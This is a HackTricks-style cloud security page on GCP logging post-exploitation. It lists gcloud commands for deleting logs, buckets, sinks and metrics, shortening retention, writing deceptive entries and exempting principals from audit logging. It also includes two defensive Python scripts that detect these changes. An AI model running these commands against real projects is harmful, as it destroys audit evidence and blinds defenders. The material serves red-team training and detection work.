# GCP - Logging Post Exploitation

> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Learn & practice Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

## Basic Information

For more information check:

GCP - Logging Enum

For other ways to disrupt monitoring check:

GCP - Monitoring Post Exploitation

## Default Logging

By default you won't be discovered just for performing read actions: Data Access audit logs (the ones that record reads) are disabled by default for every service except BigQuery, so read-only API calls usually leave no audit entry. Check the Logging Enum section for more information.

## Add an exempted principal

In [https://console.cloud.google.com/iam-admin/audit/allservices](https://console.cloud.google.com/iam-admin/audit/allservices) and [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) it's possible to add principals that will not generate logs. An attacker could abuse this to avoid being detected. Note that these exemptions only cover Data Access audit logs; Admin Activity audit logs cannot be disabled, and the exemption itself is recorded there as a `SetIamPolicy` call on the project.
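A defender-side check for the two points above (Data Access logs being off by default, and exempted principals), added here as an example and not code from the HackTricks page. It parses the `auditConfigs` block of the JSON printed by `gcloud projects get-iam-policy PROJECT_ID --format=json` and reports every exempted member and every Data Access log type that is not enabled; the policy embedded in the script is constructed sample data.

```python
"""Check a project's IAM audit configuration for Data Access logging gaps.

Added example, not code from the HackTricks page. Data Access audit logs
(DATA_READ / DATA_WRITE) are the ones that record read-type calls, and they are
also the ones the console pages above let you switch off or exempt principals
from. Input is the `auditConfigs` part of `gcloud projects get-iam-policy
PROJECT_ID --format=json`. The policy below is constructed sample data.
"""
import json
from typing import Dict, List

DATA_ACCESS_TYPES = ("DATA_READ", "DATA_WRITE")

# Constructed sample policy (only the auditConfigs part matters here).
SAMPLE_POLICY = json.dumps({
    "bindings": [],
    "auditConfigs": [
        {"service": "allServices",
         "auditLogConfigs": [
             {"logType": "ADMIN_READ"},
             {"logType": "DATA_READ", "exemptedMembers": ["user:mallory@example.com"]}]},
        {"service": "storage.googleapis.com",
         "auditLogConfigs": [
             {"logType": "DATA_READ",
              "exemptedMembers": ["serviceAccount:backup@example.iam.gserviceaccount.com"]},
             {"logType": "DATA_WRITE"}]},
    ],
})


def audit_config_findings(policy_json: str) -> List[Dict[str, str]]:
    """One finding per exempted member and per Data Access log type left disabled.

    The allServices entry applies to every service, so a service-specific entry
    only counts as missing a log type if allServices does not enable it either.
    """
    policy = json.loads(policy_json)
    configs = policy.get("auditConfigs", [])
    if not configs:
        # No auditConfigs at all: Data Access logging is at the platform default,
        # i.e. off for everything except BigQuery.
        return [{"service": "allServices", "logType": "DATA_READ",
                 "issue": "no_audit_config", "member": ""}]
    base_enabled = set()
    for cfg in configs:
        if cfg.get("service") == "allServices":
            base_enabled |= {c.get("logType") for c in cfg.get("auditLogConfigs", [])}
    findings = []
    for cfg in configs:
        service = cfg.get("service", "?")
        enabled = set(base_enabled)
        for log_cfg in cfg.get("auditLogConfigs", []):
            log_type = log_cfg.get("logType", "?")
            enabled.add(log_type)
            for member in log_cfg.get("exemptedMembers", []):
                findings.append({"service": service, "logType": log_type,
                                 "issue": "exempted_member", "member": member})
        for log_type in DATA_ACCESS_TYPES:
            if log_type not in enabled:
                findings.append({"service": service, "logType": log_type,
                                 "issue": "not_enabled", "member": ""})
    return findings


if __name__ == "__main__":
    for f in audit_config_findings(SAMPLE_POLICY):
        print(f"{f['service']:28} {f['logType']:10} {f['issue']:16} {f['member']}")
```

Run it against a real policy by piping `gcloud projects get-iam-policy PROJECT_ID --format=json` into `audit_config_findings`; any `exempted_member` line is a principal whose reads are invisible to Data Access logs, and `not_enabled` on `allServices` means the default (no read logging) is still in force.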

### Read logs - `logging.logEntries.list`

<details>

<summary>Read log entries</summary>
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read 'timestamp >= "2023-01-01T00:00:00Z"' --limit=10 --format=json

# Use these options to indicate a different bucket or view to use:
#   --bucket=_Required --view=_Default
```
</details>

### `logging.logs.delete`

<details>

<summary>Delete log entries</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
</details>

### Write logs - `logging.logEntries.create`

<details>

<summary>Write a log entry</summary>
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
</details>

### `logging.buckets.update`

<details>

<summary>Update log bucket retention</summary>
```bash
# Set retention period to 1 day (_Required has a fixed one of 400 days)
gcloud logging buckets update <bucket-name> --location=<location> --description="New description" --retention-days=1
```
</details>

### `logging.buckets.delete`

<details>

<summary>Delete a log bucket</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
</details>

### `logging.links.delete`

<details>

<summary>Delete the log link</summary>
```bash
# Delete link
gcloud logging links delete <link-id> --bucket=<bucket-name> --location=<location>
```
</details>

### `logging.views.delete`

<details>

<summary>Delete the logging view</summary>
```bash
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket-name> --location=global
```
</details>

### `logging.views.update`

<details>

<summary>Update the logging view to hide data</summary>
```bash
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket-name> --location=global --description="New description for the log view"
```
</details>

### `logging.logMetrics.update`

<details>

<summary>Update log-based metrics</summary>
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
</details>

### `logging.logMetrics.delete`

<details>

<summary>Delete log-based metrics</summary>
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
```
</details>

### `logging.sinks.delete`

<details>

<summary>Delete log sink</summary>
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
```
</details>

### `logging.sinks.update`

<details>

<summary>Update/disrupt the log sink</summary>
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled

# Create a filter to exclude the attacker's logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update SINK_NAME <new-destination>

# Change the service account to one without permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove exclusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables,
# potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
</details>
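Every action in the sections above is an admin call on `logging.googleapis.com` (or a `SetIamPolicy` call, for the exempted-principal trick), so each one lands in the Admin Activity audit log, which cannot be disabled. The script below is an added detection example, not code from the HackTricks page: it reads the JSON list that `gcloud logging read --format=json` prints for those audit entries and flags the ones matching the techniques on this page. The method names are the Logging v2 RPC names as they appear in `protoPayload.methodName`; the entries embedded at the bottom are constructed samples, and the request-body field layout (`request.sink.*`, `request.bucket.retentionDays`, `serviceData.policyDelta.auditConfigDeltas`) is assumed to match what the real logs carry.

```python
"""Flag Cloud Logging configuration tampering in Admin Activity audit log entries.

Added example, not code from the HackTricks page. Input is the JSON list printed
by `gcloud logging read --format=json` for Admin Activity entries; the samples
below are constructed and their field layout is assumed.
"""
import json
from typing import Dict, List

# Logging v2 RPC names (protoPayload.methodName) mapped to the permission each
# one needs, matching the sections of this page.
WATCHED_METHODS = {
    "google.logging.v2.LoggingServiceV2.DeleteLog": "logging.logs.delete",
    "google.logging.v2.ConfigServiceV2.UpdateBucket": "logging.buckets.update",
    "google.logging.v2.ConfigServiceV2.DeleteBucket": "logging.buckets.delete",
    "google.logging.v2.ConfigServiceV2.DeleteLink": "logging.links.delete",
    "google.logging.v2.ConfigServiceV2.UpdateView": "logging.views.update",
    "google.logging.v2.ConfigServiceV2.DeleteView": "logging.views.delete",
    "google.logging.v2.MetricsServiceV2.UpdateLogMetric": "logging.logMetrics.update",
    "google.logging.v2.MetricsServiceV2.DeleteLogMetric": "logging.logMetrics.delete",
    "google.logging.v2.ConfigServiceV2.UpdateSink": "logging.sinks.update",
    "google.logging.v2.ConfigServiceV2.DeleteSink": "logging.sinks.delete",
}


def describe_request(method: str, request: dict) -> str:
    """Pull the relevant detail out of an UpdateSink / UpdateBucket request body.
    Field names (sink.disabled, sink.exclusions, updateMask, customWriterIdentity,
    bucket.retentionDays) follow the Logging v2 request messages; assumed here."""
    parts = []
    if method.endswith("UpdateSink"):
        sink = request.get("sink", {})
        mask = request.get("updateMask", "")
        if sink.get("disabled"):
            parts.append("sink disabled")
        names = [e.get("name", "?") for e in sink.get("exclusions", [])]
        if names:
            parts.append("exclusions now: " + ",".join(names))
        elif "exclusions" in mask:
            parts.append("all exclusions cleared")
        if "destination" in mask:
            parts.append("destination -> " + sink.get("destination", "?"))
        if request.get("customWriterIdentity"):
            parts.append("writer identity -> " + request["customWriterIdentity"])
    elif method.endswith("UpdateBucket"):
        days = request.get("bucket", {}).get("retentionDays")
        if days is not None:
            parts.append(f"retentionDays={days}")
    return "; ".join(parts)


def suspicious_logging_changes(entries_json: str) -> List[Dict[str, str]]:
    """Return one finding per audit entry that matches a technique on this page."""
    findings = []
    for entry in json.loads(entries_json):
        p = entry.get("protoPayload", {})
        method = p.get("methodName", "")
        actor = p.get("authenticationInfo", {}).get("principalEmail", "?")
        target = p.get("resourceName", "")
        if method in WATCHED_METHODS:
            findings.append({"actor": actor, "permission": WATCHED_METHODS[method], "target": target,
                             "detail": describe_request(method, p.get("request", {}))})
        elif method == "SetIamPolicy":
            # Audit-config edits (the exempted-principal trick) show up as auditConfigDeltas.
            deltas = p.get("serviceData", {}).get("policyDelta", {}).get("auditConfigDeltas", [])
            for d in deltas:
                member = d.get("exemptedMember")
                if d.get("action") == "ADD" and member:
                    detail = f"{member} exempted from {d.get('logType')} on {d.get('service')}"
                elif d.get("action") == "REMOVE" and not member:
                    detail = f"{d.get('logType')} logging removed for {d.get('service')}"
                else:
                    continue
                findings.append({"actor": actor, "permission": "resourcemanager.projects.setIamPolicy",
                                 "target": target, "detail": detail})
    return findings


# Constructed sample entries (not real log output); the last one is benign noise.
SAMPLE_ENTRIES = json.dumps([
    {"protoPayload": {"methodName": "google.logging.v2.ConfigServiceV2.UpdateSink",
                      "authenticationInfo": {"principalEmail": "mallory@example.com"},
                      "resourceName": "projects/demo-project/sinks/siem-export",
                      "request": {"updateMask": "disabled", "sink": {"name": "siem-export", "disabled": True}}}},
    {"protoPayload": {"methodName": "google.logging.v2.ConfigServiceV2.UpdateBucket",
                      "authenticationInfo": {"principalEmail": "mallory@example.com"},
                      "resourceName": "projects/demo-project/locations/global/buckets/_Default",
                      "request": {"bucket": {"retentionDays": 1}}}},
    {"protoPayload": {"methodName": "google.logging.v2.LoggingServiceV2.DeleteLog",
                      "authenticationInfo": {"principalEmail": "mallory@example.com"},
                      "resourceName": "projects/demo-project/logs/app-audit"}},
    {"protoPayload": {"methodName": "SetIamPolicy",
                      "authenticationInfo": {"principalEmail": "mallory@example.com"},
                      "resourceName": "projects/demo-project",
                      "serviceData": {"policyDelta": {"auditConfigDeltas": [
                          {"action": "ADD", "service": "allServices", "logType": "DATA_READ",
                           "exemptedMember": "user:mallory@example.com"}]}}}},
    {"protoPayload": {"methodName": "google.logging.v2.ConfigServiceV2.ListSinks",
                      "authenticationInfo": {"principalEmail": "alice@example.com"},
                      "resourceName": "projects/demo-project"}},
])

if __name__ == "__main__":
    for f in suspicious_logging_changes(SAMPLE_ENTRIES):
        print(f"{f['actor']} used {f['permission']} on {f['target']}: {f['detail']}")
```

To feed it real data, pull the Admin Activity entries with a filter such as `protoPayload.serviceName="logging.googleapis.com"` (plus `protoPayload.methodName="SetIamPolicy"` for the IAM side) and pass the `--format=json` output to `suspicious_logging_changes`. Because an attacker can also shorten retention or disable the sink that forwards these very entries, the most reliable place to run this is on a copy exported to a separate project or organization-level sink the project's principals cannot modify.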
